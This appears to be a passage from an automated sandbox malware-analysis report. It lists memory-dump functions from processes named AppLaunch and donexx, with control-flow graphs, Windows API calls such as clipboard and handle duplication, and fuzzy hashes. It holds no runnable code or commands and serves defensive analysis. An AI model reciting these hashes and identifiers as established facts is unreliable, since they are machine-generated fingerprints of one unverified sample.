                                                                            control_flow_graph 964 ab0af58-ab0afbe 965 ab0afc0-ab0afc6 964->965 966 ab0afc9-ab0afd0 964->966 965->966 967 ab0afd2-ab0afd8 966->967 968 ab0afdb-ab0b07a CreateWindowExW 966->968 967->968 970 ab0b083-ab0b0bb 968->970 971 ab0b07c-ab0b082 968->971 975 ab0b0c8 970->975 976 ab0b0bd-ab0b0c0 970->976 971->970 977 ab0b0c9 975->977 976->975 977->977
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0AB0B06A
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: eae09eb599a41f6fc23fa67544e7dea606c548a719fe0b807fad350ca9a1d9b4
                                                                            • Instruction ID: b7e59f16a4f48821c810c61d68ce89e3783d2b0e48817f1a8d9f4463a36a34b1
                                                                            • Opcode Fuzzy Hash: eae09eb599a41f6fc23fa67544e7dea606c548a719fe0b807fad350ca9a1d9b4
                                                                            • Instruction Fuzzy Hash: 4641C2B1D103099FDB14CF99C984ADEBFB5FF88310F24856AE418AB250D775A885CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0AB0E914 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 978 ab0e914-ab0fa74 981 ab0fb24-ab0fb44 call ab08ffc 978->981 982 ab0fa7a-ab0fa7f 978->982 989 ab0fb47-ab0fb54 981->989 984 ab0fa81-ab0fab8 982->984 985 ab0fad2-ab0fb0a CallWindowProcW 982->985 991 ab0fac1-ab0fad0 984->991 992 ab0faba-ab0fac0 984->992 987 ab0fb13-ab0fb22 985->987 988 ab0fb0c-ab0fb12 985->988 987->989 988->987 991->989 992->991
                                                                            APIs
                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0AB0FAF9
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: CallProcWindow
                                                                            • String ID:
                                                                            • API String ID: 2714655100-0
                                                                            • Opcode ID: 1fc7018be248571542470f153bd1891fc792b3f5d22e76da7083426e672207e2
                                                                            • Instruction ID: 6284790029cb36b9382b8967257b3fd27327979be496b89e9cb2bfe5cce3abfa
                                                                            • Opcode Fuzzy Hash: 1fc7018be248571542470f153bd1891fc792b3f5d22e76da7083426e672207e2
                                                                            • Instruction Fuzzy Hash: 44413DB5A003459FCB24CF99C888EAABBF5FF88314F258499D419A7361D774A941CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0AB0EC68 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 995 ab0ec68-ab0ec75 996 ab0ec77-ab0ed96 995->996 997 ab0ec1e-ab0ec3c DuplicateHandle 995->997 998 ab0ec45-ab0ec62 997->998 999 ab0ec3e-ab0ec44 997->999 999->998
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0AB0EC2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 30fedc639b4a0888dbcf5f6f26be42ce119eea034f50bf98b60b5867fdfc6346
                                                                            • Instruction ID: 57370f575b19b8ec3ecdc93342bc4925565b26e31206c3c0e3772cfdd3a566a5
                                                                            • Opcode Fuzzy Hash: 30fedc639b4a0888dbcf5f6f26be42ce119eea034f50bf98b60b5867fdfc6346
                                                                            • Instruction Fuzzy Hash: 9B31ABB66426418FE310CF25EA5DBAA3BA6E79C312F10406BEA11CB3C1DA7C5D42CF15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 052AF2D4 Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1013 52af2d4-52af378 OleGetClipboard 1015 52af37a-52af380 1013->1015 1016 52af381-52af3cf 1013->1016 1015->1016 1021 52af3df 1016->1021 1022 52af3d1-52af3d5 1016->1022 1025 52af3e0 1021->1025 1022->1021 1023 52af3d7-52af3da call 52a0ac8 1022->1023 1023->1021 1025->1025
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard
                                                                            • String ID:
                                                                            • API String ID: 220874293-0
                                                                            • Opcode ID: b1116652e46c6a82b98952827c4f48d88a166f8ca4ba7ff99920d8b0e074221e
                                                                            • Instruction ID: e09aff1fb996d72af1ab81b313e8ce7b5d2b80d848f3a8a3ed6cc9d47e930995
                                                                            • Opcode Fuzzy Hash: b1116652e46c6a82b98952827c4f48d88a166f8ca4ba7ff99920d8b0e074221e
                                                                            • Instruction Fuzzy Hash: DC3104B1D11288DFDB14CFA9D984BDDBBF1BF48304F248059E404AB294D7B45949CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 052AF2E0 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1026 52af2e0-52af378 OleGetClipboard 1028 52af37a-52af380 1026->1028 1029 52af381-52af3cf 1026->1029 1028->1029 1034 52af3df 1029->1034 1035 52af3d1-52af3d5 1029->1035 1038 52af3e0 1034->1038 1035->1034 1036 52af3d7-52af3da call 52a0ac8 1035->1036 1036->1034 1038->1038
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard
                                                                            • String ID:
                                                                            • API String ID: 220874293-0
                                                                            • Opcode ID: 7a9931eaf7ecf1943fcac33193094a815a1dac8a5ad42490508ae851d7a4d004
                                                                            • Instruction ID: 4d30b50e3075797487f7249254e82aa6202b0f84bf1f261795fd632de7c48681
                                                                            • Opcode Fuzzy Hash: 7a9931eaf7ecf1943fcac33193094a815a1dac8a5ad42490508ae851d7a4d004
                                                                            • Instruction Fuzzy Hash: C13124B1D11248DFDB14DF99CA84BCEBBF5BF48304F248019E404AB390D7B86989CB95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 052AED20 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1039 52aed20-52aed2d 1040 52aeceb-52aecfc KiUserCallbackDispatcher 1039->1040 1041 52aed2f-52aed4d 1039->1041 1042 52aecfe-52aed04 1040->1042 1043 52aed05-52aed19 1040->1043 1045 52aed4f-52aed52 1041->1045 1042->1043 1047 52aed61-52aed64 1045->1047 1048 52aed54-52aed5c 1045->1048 1049 52aed8f-52aed92 1047->1049 1050 52aed66-52aed8a call 52a1458 * 2 1047->1050 1048->1047 1053 52aeda1-52aeda4 1049->1053 1054 52aed94 1049->1054 1050->1049 1056 52aedae-52aedb1 1053->1056 1057 52aeda6-52aedad 1053->1057 1111 52aed94 call 52aef28 1054->1111 1112 52aed94 call 52aef18 1054->1112 1059 52aedbb-52aedbe 1056->1059 1060 52aedb3-52aedb8 1056->1060 1063 52aede9-52aedec 1059->1063 1064 52aedc0-52aede4 call 52a1458 * 2 1059->1064 1060->1059 1061 52aed9a-52aed9c 1061->1053 1065 52aedee-52aedfa 1063->1065 1066 52aee05-52aee08 1063->1066 1064->1063 1078 52aee00 1065->1078 1079 52aef07-52aef0e 1065->1079 1068 52aee0a-52aee0c 1066->1068 1069 52aee28-52aee2b 1066->1069 1073 52aee1a 1068->1073 1074 52aee0e-52aee18 1068->1074 1075 52aee2d-52aee51 call 52a1458 * 2 1069->1075 1076 52aee56-52aee59 1069->1076 1082 52aee1f-52aee21 1073->1082 1074->1082 1075->1076 1080 52aee5b-52aee7f call 52a1458 * 2 1076->1080 1081 52aee84-52aee86 1076->1081 1078->1066 1080->1081 1087 52aee88 1081->1087 1088 52aee8d-52aee90 1081->1088 1082->1080 1086 52aee23 1082->1086 1086->1069 1087->1088 1088->1045 1091 52aee96-52aeea0 1088->1091 1096 52aeea2 1091->1096 1097 52aeea7-52aeefa call 52a1458 * 2 1091->1097 1096->1097 1109 52aeefc 1097->1109 1110 52aef04 1097->1110 1109->1110 1110->1079 1111->1061 1112->1061
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL ref: 052AECEF
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: fac3997882dd77ffe113be2b7f652e9da632007c9b5ebf98c94d8d8d91f75603
                                                                            • Instruction ID: 4deee98cb38d25349b18a9410fefcef50ac640d41304e2514c268eb9286f4332
                                                                            • Opcode Fuzzy Hash: fac3997882dd77ffe113be2b7f652e9da632007c9b5ebf98c94d8d8d91f75603
                                                                            • Instruction Fuzzy Hash: FE1138337101558BCB30A67DD8443AABBEEEF88320F254869D44DD3350DA31588187A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0AB0EBA0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1113 ab0eba0-ab0ec3c DuplicateHandle 1114 ab0ec45-ab0ec62 1113->1114 1115 ab0ec3e-ab0ec44 1113->1115 1115->1114
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0AB0EC2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 5619d054ef16c5195ed5aa3e896f2ad8e03019e2ba769b45cd69a5ead8d89046
                                                                            • Instruction ID: 0ad6babae1d2fa573b545ed188285609b9c1049f528e11aa03083974fb67ed02
                                                                            • Opcode Fuzzy Hash: 5619d054ef16c5195ed5aa3e896f2ad8e03019e2ba769b45cd69a5ead8d89046
                                                                            • Instruction Fuzzy Hash: C221E4B59012489FDB10CFA9D984AEEBFF4FB48320F24845AE854B3350D375A945DFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0AB0EBA8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1118 ab0eba8-ab0ec3c DuplicateHandle 1119 ab0ec45-ab0ec62 1118->1119 1120 ab0ec3e-ab0ec44 1118->1120 1120->1119
                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0AB0EC2F
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: b5e45fb884c75fd2f2115bb91d2add22793721b168a468810aaa2be40a192de4
                                                                            • Instruction ID: eb6b84c1c10a14a8e3d6b7e01b22d824dc64efcc3e428bfc9d505737c83254cd
                                                                            • Opcode Fuzzy Hash: b5e45fb884c75fd2f2115bb91d2add22793721b168a468810aaa2be40a192de4
                                                                            • Instruction Fuzzy Hash: 8D21F5B59002089FDB10CFAAD984ADEFFF8FB48320F14845AE814A3350D374A944CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0AB08288 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0AB09F16
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 5fb431902302c96a66b21732f038200da19d9bc78e8be5534687085b034254ab
                                                                            • Instruction ID: 25e272cdfb269762a75f6f348dfee41205208ae7ba6ebeb289a33cfb3ece9fd7
                                                                            • Opcode Fuzzy Hash: 5fb431902302c96a66b21732f038200da19d9bc78e8be5534687085b034254ab
                                                                            • Instruction Fuzzy Hash: 1711F0B6C002498FCB20CF9AC944BDEFBF4EB88324F1484AAD819A7251D374A545CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0AB09EA8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0AB09F16
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.473814006.000000000AB00000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB00000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_ab00000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 2fdf6c0ab825ae8484153410fc46b2ec448e021afb8a1585bb10f096168edbae
                                                                            • Instruction ID: a59696feb921f3ca98296ea382de8024867206e25b3bcbdf50d901f0b9b2eb37
                                                                            • Opcode Fuzzy Hash: 2fdf6c0ab825ae8484153410fc46b2ec448e021afb8a1585bb10f096168edbae
                                                                            • Instruction Fuzzy Hash: F41113B6C002498FDB20CFAAC944ADEFBF4EF88320F15845AD429B7650C378A545CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 052AEC88 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL ref: 052AECEF
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 51533f34271938c68c4e7b76225f50f8d74a3779f73970599b7c16230bbd4216
                                                                            • Instruction ID: ca4f2ba7a7808e456d24529a2398be8909926ccf29474c8a8648f76733dcc40d
                                                                            • Opcode Fuzzy Hash: 51533f34271938c68c4e7b76225f50f8d74a3779f73970599b7c16230bbd4216
                                                                            • Instruction Fuzzy Hash: CD1103B19002498FDB20CF99D984BDEFFF4AF88324F24845AD459A3350C774A545CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 052AF190 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0
                                                                            • Opcode ID: dc983246b9e036eaae39bfd1d508f9e9c8ecbbdace99b9b0ca7d8761836f0b65
                                                                            • Instruction ID: 20cf91b5e6757a21bdcc9e22ab7b1768dfef5692423b752c5e9ed3d76b167bde
                                                                            • Opcode Fuzzy Hash: dc983246b9e036eaae39bfd1d508f9e9c8ecbbdace99b9b0ca7d8761836f0b65
                                                                            • Instruction Fuzzy Hash: F61115B59002498FCB20CF99D9447DEBBF4AB48324F24845AD418B7750D378A984CFA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 052AF198 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0
                                                                            • Opcode ID: 0528452d0c1e26f6c27394fdbc56ee9d25f9375f9c427fb912358dfabae915fd
                                                                            • Instruction ID: 3c2c53bd82e2a840be60bcb58e9a897f4279f869a3eeea086812e6f4a751409a
                                                                            • Opcode Fuzzy Hash: 0528452d0c1e26f6c27394fdbc56ee9d25f9375f9c427fb912358dfabae915fd
                                                                            • Instruction Fuzzy Hash: E111E5B59002498FCB20DF9AD944B9EBBF4AB48324F24845AD418A7310D378A984CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 052AEC90 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL ref: 052AECEF
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472498830.00000000052A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_52a0000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 8509e1b0deb3cd9c6c4512167139d5e1e04515004f2922015105563cc25ba50e
                                                                            • Instruction ID: 680345a5d9c4e660392a73d8cf78c0dac230a900f7ccb56e4ec2403ab9abbfe6
                                                                            • Opcode Fuzzy Hash: 8509e1b0deb3cd9c6c4512167139d5e1e04515004f2922015105563cc25ba50e
                                                                            • Instruction Fuzzy Hash: 0411D3B18002498FDB20DF9AD984B9EFBF8AB48324F24845AD519A7350D774A544CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050FD4D8 Relevance: .1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472261641.00000000050FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 050FD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_50fd000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40e45cedd32f1155390353009a4c69f747897b20ffea8b0d25c0008faa174adc
                                                                            • Instruction ID: 4cd092cca0cb30f03528ea603aec70ccae3bed7ba77acd9826641138fbc98684
                                                                            • Opcode Fuzzy Hash: 40e45cedd32f1155390353009a4c69f747897b20ffea8b0d25c0008faa174adc
                                                                            • Instruction Fuzzy Hash: 7A213A72504244DFDB15CF14E9C0F2EBFA6FB88718F248569EA054B616C33AD846CBA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0510D030 Relevance: .1, Instructions: 72COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472305912.000000000510D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0510D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_510d000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 460527142f1ad864f109d38fae2df15a58a14a84f52bf230b7c67c0dbcf0da75
                                                                            • Instruction ID: 79cd6749796c582797197f38b9d65c3bf7df802204b6d8c6086214f1c3cd2aa4
                                                                            • Opcode Fuzzy Hash: 460527142f1ad864f109d38fae2df15a58a14a84f52bf230b7c67c0dbcf0da75
                                                                            • Instruction Fuzzy Hash: 76210371604240DFDB24DF54E9C0B26BBA6FB84314F64C569E8094B29AC7BAD846CA61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0510D118 Relevance: .1, Instructions: 71COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472305912.000000000510D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0510D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_510d000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 493be849a5689ac827f802773699e650c2d90fe81a8442e28e0d3f4af2fef1e3
                                                                            • Instruction ID: 210c96977402a53408585065ecf17bd9f0a572c6192bc42e07f415a0244dddd2
                                                                            • Opcode Fuzzy Hash: 493be849a5689ac827f802773699e650c2d90fe81a8442e28e0d3f4af2fef1e3
                                                                            • Instruction Fuzzy Hash: 2721F671604344DFDB14DF54E9C0F26BFA6FB84314F24C56DE8094B295CB7AD846CA61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 050FD4D3 Relevance: .1, Instructions: 56COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472261641.00000000050FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 050FD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_50fd000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7c0950334716d25cacc26a968033e784a243883c4adbded9c143211097e17f37
                                                                            • Instruction ID: 8b1d3ad575f7dbc1308be768481408919fa1a326487381c3f7fe2af1949fca36
                                                                            • Opcode Fuzzy Hash: 7c0950334716d25cacc26a968033e784a243883c4adbded9c143211097e17f37
                                                                            • Instruction Fuzzy Hash: 5811E676504240CFDB16CF14D9C4B1ABFB2FB84724F24C6A9D9094B616C33AD45ACBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0510D02B Relevance: .1, Instructions: 53COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472305912.000000000510D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0510D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_510d000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 647e1795f279123763bd51818ce11fa705b603491e76423f6d97edcb6bf329a1
                                                                            • Instruction ID: 38e2d7bea36245c2f0d123806dbc5f0871f3ebbf8a8bdf999a0bed53ff329dd0
                                                                            • Opcode Fuzzy Hash: 647e1795f279123763bd51818ce11fa705b603491e76423f6d97edcb6bf329a1
                                                                            • Instruction Fuzzy Hash: 0311BE75504280CFDB11CF54D5C0B26BFA2FB84314F28C6AAD8494B696C37AD44ACB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0510D113 Relevance: .1, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000018.00000002.472305912.000000000510D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0510D000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_24_2_510d000_AppLaunch.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a1410efef118f21b0695d9f19ef22fabbfdb768d2967e49ede1cfda46e8f082a
                                                                            • Instruction ID: 901f98c9010d562476dd3de9d1ae2e83f9b862c8368ad2e16f8f2664adc1d008
                                                                            • Opcode Fuzzy Hash: a1410efef118f21b0695d9f19ef22fabbfdb768d2967e49ede1cfda46e8f082a
                                                                            • Instruction Fuzzy Hash: 7311EF75504284CFDB16CF10D9C0B25BFB2FB84314F24C6ADD8494B692C33AD48ACB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Executed Functions

                                                                            Function 02A32B34 Relevance: 5.3, Strings: 3, Instructions: 1523COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: TJeq$$`q$$`q
                                                                            • API String ID: 0-49757582
                                                                            • Opcode ID: 58eb521d53d60d689964afe3c34c0565496be570a30ead3784c6e2ca0cb9201d
                                                                            • Instruction ID: b4c5541d04922be36e76ef91c734e90d1d9138074e27109fcef9e6bcd5934d20
                                                                            • Opcode Fuzzy Hash: 58eb521d53d60d689964afe3c34c0565496be570a30ead3784c6e2ca0cb9201d
                                                                            • Instruction Fuzzy Hash: 54E24B7A250500EFCB4A9F98D988D55BBB2FF4D32471A85D8F6099B232C732D861EF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A35298 Relevance: 1.7, Strings: 1, Instructions: 443COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: a20bfdc89e1177946bd3e6483e98a0e07621dd514c6634d059c1507adb793b36
                                                                            • Instruction ID: 0292fba73f4404dbe5358d96fa7921bc9f6d6e5cdc6d1ede9ffe216a7a25a719
                                                                            • Opcode Fuzzy Hash: a20bfdc89e1177946bd3e6483e98a0e07621dd514c6634d059c1507adb793b36
                                                                            • Instruction Fuzzy Hash: 95125D34E11229CFDB14DF79D984AAEB7F2FF88304F558969E005AB255DB34A942CF80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02A359F4 Relevance: 1.6, Strings: 1, Instructions: 379COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.408554452.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_2a30000_donexx.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: af326fd6126df3177d9e2bbe8a7c63106adb28caba767724fb3ba4d56b95ac6b
                                                                            • Instruction ID: afd1f9fa5bd25b3edd4c4a0723c6da9a88a515ff335c5bbde30d4555ebf81090
                                                                            • Opcode Fuzzy Hash: af326fd6126df3177d9e2bbe8a7c63106adb28caba767724fb3ba4d56b95ac6b
                                                                            • Instruction Fuzzy Hash: 65F18370E042658FDB15CF69C8C0AADBBF2FF88304F69C5A9E0599B255DB349981CF50
